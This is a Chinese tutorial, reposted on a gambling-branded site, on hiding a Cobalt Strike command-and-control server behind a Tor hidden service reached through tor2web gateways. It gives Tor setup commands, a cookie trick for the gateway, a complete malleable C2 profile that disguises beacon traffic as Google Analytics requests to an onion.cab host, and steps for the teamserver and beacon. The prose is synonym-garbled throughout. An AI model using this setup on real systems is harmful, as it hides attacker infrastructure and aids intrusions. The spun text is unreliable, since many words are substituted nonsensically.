藏匿的进击之-Tor Fronting | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

藏匿的进击之-Tor Fronting

0x01 简介

进修完Domain Fronting今后,又从@vysecurity的文章里学会了一个新的姿态–Tor Fronting,运用Tor Fronting ,异样能在攻击中隐蔽本身,而且越发轻易完成,此文就来引见一下这个新的姿态。

0x02 Tor Hidden Services

Tor是互联网上用于珍爱您隐私最无力的对象之一,而Tor Hidden Services则是为了隐蔽本身的网站或许其他效劳的一个效劳。经由历程此效劳,我们能够获取到一个经由历程Tor Browser来接见的Hostname,此Hostname独一且匿名,以是我们完全能够运用这个Hostname来为我们转发流量从而到达藏匿的目的。

怎样搭建Tor Hidden Services能够参考此wiki,上面引见一下我测试情况的搭建历程。 
情况为:Ubuntu 12.04 
搭建历程以下: 
检察体系信息:

lsb_release -a

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

能够看到Codename为precise,以是在这里挑选deb范例以下:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

今后依照官方wiki修正更新源,我的源途径为/etc/apt/sources.list,有的体系更新源途径可能在/etc/apt/sources.list.d/,在源中增加以下条目:

deb http://deb.torproject.org/torproject.org precise main
deb-src http://deb.torproject.org/torproject.org precise main

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

今后实行以下敕令:

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

装置:

$ sudo apt-get update
$ sudo apt-get install tor deb.torproject.org-keyring

实行完成今后,就胜利装置了,若是出现题目,能够检察一下wiki。

今后要对tor停止一下设置装备摆设,编纂设置装备摆设文件/etc/tor/torrc,将以下两个参数前的正文去掉。

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:8080

HiddenServicePort为署理的端口,将当地的8080端口效劳转发到80端口。

设置装备摆设完成今后对Tor效劳停止重启:

sudo service tor restart

检察获取到的hostname:

sudo cat /var/lib/tor/hidden_service/hostname

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

个中xxxxx.onion则为我们的Tor隐蔽效劳。经由历程接见这个地点,能够接见到我们效劳器8080端口的效劳,上面停止一下测试。 
开启8080端口的效劳:

☁  ~  cd /tmp
☁  ~  python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

运用tor浏览器接见此域名,可看到8080端口的相应:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

0x03 Tor2Web

要对这个隐蔽server停止应用,须要借助于一个署理,即tor2web,由于要想接见到隐蔽效劳,间接经由历程一样平常浏览器是不可的,以是,能够借助于tor2web,须要做的也很简单,当我们接见形如http://duskgytldkxiuqc6.onion/的链接时,间接修正.onion成.onion.to或.onion.city 或 onion.cab 或许任何一个供应此效劳的域名便可。以下图:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

固然,这里会有一个题目,就是接见的时刻,会须要我们点击一个按钮能力一般接见,以下图:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

———————————————-

申博|网络安全巴士站【www.bus123.net】

申博|网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。。

———————————————-

那末怎样能力间接接见呢,很简单,只须要带上点击今后的cookie就能够了,测试以下:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

curl -b 'onion_cab_iKnowShit=yourcookie'  'https://xxxx.onion.cab/1.txt'

0x04 Cobalt Strike

异样的,我们运用Cobalt Strike来停止测试。这里须要设置装备摆设一个新的profile,@vysecurity曾经供应了一个,详细以下: 
tor-fronting.profile

# make our C2 look like a Google Web Bug
# https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting
#
# Author: @armitagehacker
# Modified by Vincent Yiu @vysecurity for TOR.
set sleeptime "5000";
http-get {
        set uri "/___utm";
        client {
                header "Host" "bjaw6h36vwruhwvb.onion.cab";
                header "Cookie" "onion_cab_iKnowShit=8919090b066c57c2638a0956e1af4e8d";
                metadata {
                        base64url;
                        prepend "__utma";
                        parameter "utmcc";
                }
        }
        server {
                header "Content-Type" "plain/text";
                output {
                        # hexdump pixel.gif
                        # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
                        # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
                        # 0000020 01 00 01 00 00 02 01 44 00 3b
                        prepend "x01x00x01x00x00x02x01x44x00x3b";
                        prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00";
                        prepend "x47x49x46x38x39x61x01x00x01x00x80x00x00x00x00";
                        print;
                }
        }
}
http-post {
        set uri "/__utm";
        set verb "GET";
        client {
                header "Host" "bjaw6h36vwruhwvb.onion.cab";
                header "Cookie" "onion_cab_iKnowShit=8919090b066c57c2638a0956e1af4e8d";
                id {
                        prepend "UA-220";
                        append "-2";
                        parameter "utmac";
                }
                output {
                        base64url;
                        prepend "__utma";
                        parameter "utmcc";
                }
        }
        server {
                header "Content-Type" "plain/text";
                output {
                        prepend "x01x00x01x00x00x02x01x44x00x3b";
                        prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00";
                        prepend "x47x49x46x38x39x61x01x00x01x00x80x00x00x00x00";
                        print;
                }
        }
}
# dress up the staging process too
http-stager {
        server {
                header "Content-Type" "plain/text";
        }
}

在这里须要注重的是,我们须要修正Get和Post中的Host及Cookie为本身的。固然,若是你想让数据包显现其余模样,你也能够本身再写一个profile。

开启teamserver:

☁  cobal  sudo ./teamserver [your ip] hacktest tor-fronting.profile

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

连接到Teamserver,今后建立监听:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

由于onion.cab运用的https,以是我们须要天生一个HTTPS Beacon,Host随便输出一个域名,端口一定要改成443。

运用onion.cab:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

天生HTTPS Beacon:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

天生HTTPS Beacon今后,要修正监听到8080端口,而且运用HTTP,由于这是tor转发的效劳。 
挑选Edit:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

修正参数以下:

 藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

生存今后,运转HTTPS beacon,胜利上线:

藏匿的进击之-Tor Fronting 藏匿的进击之-Tor Fronting

操纵视频

0x05 小结

运用Tor Fronting 有以下几个特性: 

1、你不须要外网情况,将C2放到Docker或许当地都能够!(然则须要效劳器在墙外) 
2、使C2匿名; 
3、并不须要在目的机上装置Tor; 
4、默许是平安的。 
5、请求C2上同时装置Cobalt Strike及Tor效劳。

经由历程流量转发来隐蔽本身的真正效劳器是隐蔽的症结,而怎样寻觅转发和怎样运用它是很风趣的历程,愿望文章能给你有所启示。

0x06 参考

1、https://www.torproject.org/docs/tor-hidden-service.html.en 
2、https://www.mdsec.co.uk/2017/02/tor-fronting-utilising-hidden-services-for-privacy/ 
3、https://secureallthethings.blogspot.co.uk/2016/11/use-tor-use-empire.html 
4、https://www.tor2web.org/

本文为 Evi1cg 原创稿件,受权嘶吼独家宣布,未经许可制止转载;如若转载,请联络嘶吼编纂: http://www.4hou.com/technology/3516.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明藏匿的进击之-Tor Fronting
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址